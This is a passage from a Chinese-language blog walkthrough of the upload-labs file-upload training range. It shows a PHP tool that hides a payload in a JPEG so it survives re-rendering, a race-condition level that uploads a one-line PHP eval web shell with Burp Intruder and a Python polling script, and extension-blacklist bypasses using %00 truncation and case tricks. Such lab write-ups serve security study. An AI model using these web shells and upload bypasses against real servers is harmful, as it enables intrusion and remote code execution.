class="variable">$dis</span> = <span class="keyword">new</span> <span class="title class_">DataInputStream</span>(<span class="variable">$argv</span>[<span class="number">1</span>]);</span><br><span class="line">        <span class="variable">$outStream</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$argv</span>[<span class="number">1</span>]);</span><br><span class="line">        <span class="variable">$extraBytes</span> = <span class="number">0</span>;</span><br><span class="line">        <span class="variable">$correctImage</span> = <span class="literal">TRUE</span>;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>(<span class="variable">$dis</span>-&gt;<span class="title function_ invoke__">readShort</span>() != <span class="number">0xFFD8</span>) &#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&#x27;Incorrect SOI marker&#x27;</span>);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">while</span>((!<span class="variable">$dis</span>-&gt;<span class="title function_ invoke__">eof</span>()) &amp;&amp; (<span class="variable">$dis</span>-&gt;<span class="title function_ invoke__">readByte</span>() == <span class="number">0xFF</span>)) &#123;</span><br><span class="line">            <span class="variable">$marker</span> = <span class="variable">$dis</span>-&gt;<span class="title function_ invoke__">readByte</span>();</span><br><span class="line">            <span class="variable">$size</span> = <span class="variable">$dis</span>-&gt;<span class="title function_ invoke__">readShort</span>() - <span class="number">2</span>;</span><br><span class="line">            <span class="variable">$dis</span>-&gt;<span class="title function_ invoke__">skip</span>(<span class="variable">$size</span>);</span><br><span class="line">            <span class="keyword">if</span>(<span class="variable">$marker</span> === <span class="number">0xDA</span>) &#123;</span><br><span class="line">                <span class="variable">$startPos</span> = <span class="variable">$dis</span>-&gt;<span class="title function_ invoke__">seek</span>();</span><br><span class="line">                <span class="variable">$outStreamTmp</span> = </span><br><span class="line">                    <span class="title function_ invoke__">substr</span>(<span class="variable">$outStream</span>, <span class="number">0</span>, <span class="variable">$startPos</span>) . </span><br><span class="line">                    <span class="variable">$miniPayload</span> . </span><br><span class="line">                    <span class="title function_ invoke__">str_repeat</span>(<span class="string">&quot;\0&quot;</span>,<span class="variable">$nullbytePayloadSize</span>) . </span><br><span class="line">                    <span class="title function_ invoke__">substr</span>(<span class="variable">$outStream</span>, <span class="variable">$startPos</span>);</span><br><span class="line">                <span class="title function_ invoke__">checkImage</span>(<span class="string">&#x27;_&#x27;</span>.<span class="variable">$argv</span>[<span class="number">1</span>], <span class="variable">$outStreamTmp</span>, <span class="literal">TRUE</span>);</span><br><span class="line">                <span class="keyword">if</span>(<span class="variable">$extraBytes</span> !== <span class="number">0</span>) &#123;</span><br><span class="line">                    <span class="keyword">while</span>((!<span class="variable">$dis</span>-&gt;<span class="title function_ invoke__">eof</span>())) &#123;</span><br><span class="line">                        <span class="keyword">if</span>(<span class="variable">$dis</span>-&gt;<span class="title function_ invoke__">readByte</span>() === <span class="number">0xFF</span>) &#123;</span><br><span class="line">                            <span class="keyword">if</span>(<span class="variable">$dis</span>-&gt;readByte !== <span class="number">0x00</span>) &#123;</span><br><span class="line">                                <span class="keyword">break</span>;</span><br><span class="line">                            &#125;</span><br><span class="line">                        &#125;</span><br><span class="line">                    &#125;</span><br><span class="line">                    <span class="variable">$stopPos</span> = <span class="variable">$dis</span>-&gt;<span class="title function_ invoke__">seek</span>() - <span class="number">2</span>;</span><br><span class="line">                    <span class="variable">$imageStreamSize</span> = <span class="variable">$stopPos</span> - <span class="variable">$startPos</span>;</span><br><span class="line">                    <span class="variable">$outStream</span> = </span><br><span class="line">                        <span class="title function_ invoke__">substr</span>(<span class="variable">$outStream</span>, <span class="number">0</span>, <span class="variable">$startPos</span>) . </span><br><span class="line">                        <span class="variable">$miniPayload</span> . </span><br><span class="line">                        <span class="title function_ invoke__">substr</span>(</span><br><span class="line">                            <span class="title function_ invoke__">str_repeat</span>(<span class="string">&quot;\0&quot;</span>,<span class="variable">$nullbytePayloadSize</span>).</span><br><span class="line">                                <span class="title function_ invoke__">substr</span>(<span class="variable">$outStream</span>, <span class="variable">$startPos</span>, <span class="variable">$imageStreamSize</span>),</span><br><span class="line">                            <span class="number">0</span>,</span><br><span class="line">                            <span class="variable">$nullbytePayloadSize</span>+<span class="variable">$imageStreamSize</span>-<span class="variable">$extraBytes</span>) . </span><br><span class="line">                                <span class="title function_ invoke__">substr</span>(<span class="variable">$outStream</span>, <span class="variable">$stopPos</span>);</span><br><span class="line">                &#125; <span class="keyword">elseif</span>(<span class="variable">$correctImage</span>) &#123;</span><br><span class="line">                    <span class="variable">$outStream</span> = <span class="variable">$outStreamTmp</span>;</span><br><span class="line">                &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                    <span class="keyword">break</span>;</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">if</span>(<span class="title function_ invoke__">checkImage</span>(<span class="string">&#x27;payload_&#x27;</span>.<span class="variable">$argv</span>[<span class="number">1</span>], <span class="variable">$outStream</span>)) &#123;</span><br><span class="line">                    <span class="keyword">die</span>(<span class="string">&#x27;Success!&#x27;</span>);</span><br><span class="line">                &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                    <span class="keyword">break</span>;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="title function_ invoke__">unlink</span>(<span class="string">&#x27;payload_&#x27;</span>.<span class="variable">$argv</span>[<span class="number">1</span>]);</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&#x27;Something\&#x27;s wrong&#x27;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">checkImage</span>(<span class="params"><span class="variable">$filename</span>, <span class="variable">$data</span>, <span class="variable">$unlink</span> = <span class="literal">FALSE</span></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">global</span> <span class="variable">$correctImage</span>;</span><br><span class="line">        <span class="title function_ invoke__">file_put_contents</span>(<span class="variable">$filename</span>, <span class="variable">$data</span>);</span><br><span class="line">        <span class="variable">$correctImage</span> = <span class="literal">TRUE</span>;</span><br><span class="line">        <span class="title function_ invoke__">imagecreatefromjpeg</span>(<span class="variable">$filename</span>);</span><br><span class="line">        <span class="keyword">if</span>(<span class="variable">$unlink</span>)</span><br><span class="line">            <span class="title function_ invoke__">unlink</span>(<span class="variable">$filename</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="variable">$correctImage</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">custom_error_handler</span>(<span class="params"><span class="variable">$errno</span>, <span class="variable">$errstr</span>, <span class="variable">$errfile</span>, <span class="variable">$errline</span></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">global</span> <span class="variable">$extraBytes</span>, <span class="variable">$correctImage</span>;</span><br><span class="line">        <span class="variable">$correctImage</span> = <span class="literal">FALSE</span>;</span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/(\d+) extraneous bytes before marker/&#x27;</span>, <span class="variable">$errstr</span>, <span class="variable">$m</span>)) &#123;</span><br><span class="line">            <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$m</span>[<span class="number">1</span>])) &#123;</span><br><span class="line">                <span class="variable">$extraBytes</span> = (<span class="keyword">int</span>)<span class="variable">$m</span>[<span class="number">1</span>];</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">DataInputStream</span> </span>&#123;</span><br><span class="line">        <span class="keyword">private</span> <span class="variable">$binData</span>;</span><br><span class="line">        <span class="keyword">private</span> <span class="variable">$order</span>;</span><br><span class="line">        <span class="keyword">private</span> <span class="variable">$size</span>;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$filename</span>, <span class="variable">$order</span> = <span class="literal">false</span>, <span class="variable">$fromString</span> = <span class="literal">false</span></span>) </span>&#123;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;binData = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;order = <span class="variable">$order</span>;</span><br><span class="line">            <span class="keyword">if</span>(!<span class="variable">$fromString</span>) &#123;</span><br><span class="line">                <span class="keyword">if</span>(!<span class="title function_ invoke__">file_exists</span>(<span class="variable">$filename</span>) || !<span class="title function_ invoke__">is_file</span>(<span class="variable">$filename</span>))</span><br><span class="line">                    <span class="keyword">die</span>(<span class="string">&#x27;File not exists [&#x27;</span>.<span class="variable">$filename</span>.<span class="string">&#x27;]&#x27;</span>);</span><br><span class="line">                <span class="variable language_">$this</span>-&gt;binData = <span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$filename</span>);</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="variable language_">$this</span>-&gt;binData = <span class="variable">$filename</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;size = <span class="title function_ invoke__">strlen</span>(<span class="variable">$this</span>-&gt;binData);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">seek</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">            <span class="keyword">return</span> (<span class="variable language_">$this</span>-&gt;size - <span class="title function_ invoke__">strlen</span>(<span class="variable">$this</span>-&gt;binData));</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">skip</span>(<span class="params"><span class="variable">$skip</span></span>) </span>&#123;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;binData = <span class="title function_ invoke__">substr</span>(<span class="variable">$this</span>-&gt;binData, <span class="variable">$skip</span>);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">readByte</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">            <span class="keyword">if</span>(<span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">eof</span>()) &#123;</span><br><span class="line">                <span class="keyword">die</span>(<span class="string">&#x27;End Of File&#x27;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="variable">$byte</span> = <span class="title function_ invoke__">substr</span>(<span class="variable">$this</span>-&gt;binData, <span class="number">0</span>, <span class="number">1</span>);</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;binData = <span class="title function_ invoke__">substr</span>(<span class="variable">$this</span>-&gt;binData, <span class="number">1</span>);</span><br><span class="line">            <span class="keyword">return</span> <span class="title function_ invoke__">ord</span>(<span class="variable">$byte</span>);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">readShort</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">            <span class="keyword">if</span>(<span class="title function_ invoke__">strlen</span>(<span class="variable">$this</span>-&gt;binData) &lt; <span class="number">2</span>) &#123;</span><br><span class="line">                <span class="keyword">die</span>(<span class="string">&#x27;End Of File&#x27;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="variable">$short</span> = <span class="title function_ invoke__">substr</span>(<span class="variable">$this</span>-&gt;binData, <span class="number">0</span>, <span class="number">2</span>);</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;binData = <span class="title function_ invoke__">substr</span>(<span class="variable">$this</span>-&gt;binData, <span class="number">2</span>);</span><br><span class="line">            <span class="keyword">if</span>(<span class="variable language_">$this</span>-&gt;order) &#123;</span><br><span class="line">                <span class="variable">$short</span> = (<span class="title function_ invoke__">ord</span>(<span class="variable">$short</span>[<span class="number">1</span>]) &lt;&lt; <span class="number">8</span>) + <span class="title function_ invoke__">ord</span>(<span class="variable">$short</span>[<span class="number">0</span>]);</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="variable">$short</span> = (<span class="title function_ invoke__">ord</span>(<span class="variable">$short</span>[<span class="number">0</span>]) &lt;&lt; <span class="number">8</span>) + <span class="title function_ invoke__">ord</span>(<span class="variable">$short</span>[<span class="number">1</span>]);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">return</span> <span class="variable">$short</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">eof</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">            <span class="keyword">return</span> !<span class="variable language_">$this</span>-&gt;binData||(<span class="title function_ invoke__">strlen</span>(<span class="variable">$this</span>-&gt;binData) === <span class="number">0</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h2 id="条件竞争"><a href="#条件竞争" class="headerlink" title="条件竞争"></a>条件竞争</h2><p>&#x3D;&#x3D;Pass-18&#x3D;&#x3D;</p>
<p>查看提示需要代码审计</p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202503131913099.png" alt="image-20241018220600826" style="zoom:50%;" />

<p>​	使用<code>move_uploaded_file()</code>函数，将上传的文件保存到服务器，再进行判断是否是<code>jpg、png、gif</code>中的一种类型，如果在数组中就保存重命名，如果不在根据<code>unlink()</code>就直接删除</p>
<p>​	代码他是先将图片上传上去，才开始进行判断后缀名、二次渲染。如果在上传上去的一瞬间访问这个文件，那他就不能对这个文件删除、二次渲染。这就相当于我们打开了一个文件，然后再去删除这个文件，就会提示这个文件在另一程序中打开无法删除。</p>
<p><strong>通关步骤：</strong></p>
<p>上传<code>&lt;?php @eval($_POST[&quot;shell&quot;]); ?&gt;</code>然后<code>bp</code>拦截，发送到<code>Intruder</code></p>
<p>设置<code>payload</code>类型</p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202503131912203.png" alt="image-20241018220215886" style="zoom:50%;" />

<p>增多线程数</p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202503131912712.png" alt="image-20241018220239756" style="zoom:50%;" />

<p>开始攻击，然后运行脚本</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&quot;http://172.20.10.10/uploads/upload/1.php&quot;</span></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    html = requests.get(url)</span><br><span class="line">    <span class="keyword">if</span> html.status_code == <span class="number">200</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;OK&quot;</span>)</span><br><span class="line">        <span class="keyword">break</span></span><br></pre></td></tr></table></figure>

<h2 id="00截断绕过"><a href="#00截断绕过" class="headerlink" title="%00截断绕过"></a><code>%00</code>截断绕过</h2><img src="https://raw.githubusercontent.com/Qwen11/picture/main/202503131912556.png" alt="image-20241018230053056" style="zoom:50%;" />

<ul>
<li>黑名单中没有过滤<code>PHP</code>，因此可以利用大写绕过</li>
<li>通过<code>move_upload_file()</code>函数移动文件<ul>
<li>因此可以修改后缀为<code>php/.</code>，<code>php/.</code>可以绕过黑名单，<code>move_upload_file()</code>函数会删除末尾的<code>/.</code></li>
<li>或者利用<code>%00</code>截断绕过</li>
</ul>
</li>
<li><code>$file_name</code>是通过<code>POST</code>传参获取的，<code>bp</code>抓包修改应<code>POST</code>参数后缀为<code>PHP</code></li>
</ul>
<p>最后再介绍一下<code>%00</code>截断绕过的方法</p>
<p><img src="https://raw.githubusercontent.com/Qwen11/picture/main/202503131911620.png" alt="image-20241018232435030"></p>
<p>发送上传成功后，打开图像链接</p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202503131911041.png" alt="image-20241018232615034" style="zoom:50%;" />

<p>成功解析脚本</p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202503131911844.png" alt="image-20241018232640959" style="zoom:50%;" />

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/web%E5%AE%89%E5%85%A8/" rel="tag"># web安全</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2024/10/17/pikachu%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/" rel="prev" title="pikachu靶场通关记录">
      <i class="fa fa-chevron-left"></i> pikachu靶场通关记录
    </a></div>
      <div class="post-nav-item">
    <a href="/2024/10/29/sqli-lab%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/" rel="next" title="sqli-lab靶场通关记录">
      sqli-lab靶场通关记录 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">
      <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=1974443814&auto=0&height=66"></iframe>

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AF%B9content%E7%9A%84%E8%BF%87%E6%BB%A4"><span class="nav-number">1.</span> <span class="nav-text">对content的过滤</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#MIME%E9%AA%8C%E8%AF%81"><span class="nav-number">2.</span> <span class="nav-text">MIME验证</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%AB%E5%90%8D%E6%9B%BF%E6%8D%A2"><span class="nav-number">3.</span> <span class="nav-text">别名替换</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#wp"><span class="nav-number">3.0.1.</span> <span class="nav-text">wp</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#htaccess"><span class="nav-number">4.</span> <span class="nav-text">.htaccess</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#user-ini"><span class="nav-number">5.</span> <span class="nav-text">.user.ini</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%A4%A7%E5%B0%8F%E5%86%99%E7%BB%95%E8%BF%87"><span class="nav-number">6.</span> <span class="nav-text">大小写绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Pass-0708"><span class="nav-number">7.</span> <span class="nav-text">Pass-0708</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DATA"><span class="nav-number">8.</span> <span class="nav-text">::$DATA</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%8C%E5%86%99%E7%BB%95%E8%BF%87"><span class="nav-number">9.</span> <span class="nav-text">双写绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%9B%BE%E7%89%87%E9%A9%AC"><span class="nav-number">10.</span> <span class="nav-text">图片马</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%B7%BB%E5%8A%A0%E6%96%87%E4%BB%B6%E5%A4%B4"><span class="nav-number">10.0.1.</span> <span class="nav-text">添加文件头</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8copy%E5%91%BD%E4%BB%A4"><span class="nav-number">10.0.2.</span> <span class="nav-text">使用copy命令</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BA%8C%E6%AC%A1%E6%B8%B2%E6%9F%93"><span class="nav-number">11.</span> <span class="nav-text">二次渲染</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#gif"><span class="nav-number">11.0.1.</span> <span class="nav-text">gif</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#png"><span class="nav-number">11.0.2.</span> <span class="nav-text">png</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#jpg"><span class="nav-number">11.0.3.</span> <span class="nav-text">jpg</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9D%A1%E4%BB%B6%E7%AB%9E%E4%BA%89"><span class="nav-number">12.</span> <span class="nav-text">条件竞争</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#00%E6%88%AA%E6%96%AD%E7%BB%95%E8%BF%87"><span class="nav-number">13.</span> <span class="nav-text">%00截断绕过</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Qwen"
      src="/images/avatar_1.jpg">
  <p class="site-author-name" itemprop="name">Qwen</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">26</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">13</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Qwen</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>




    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>



        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
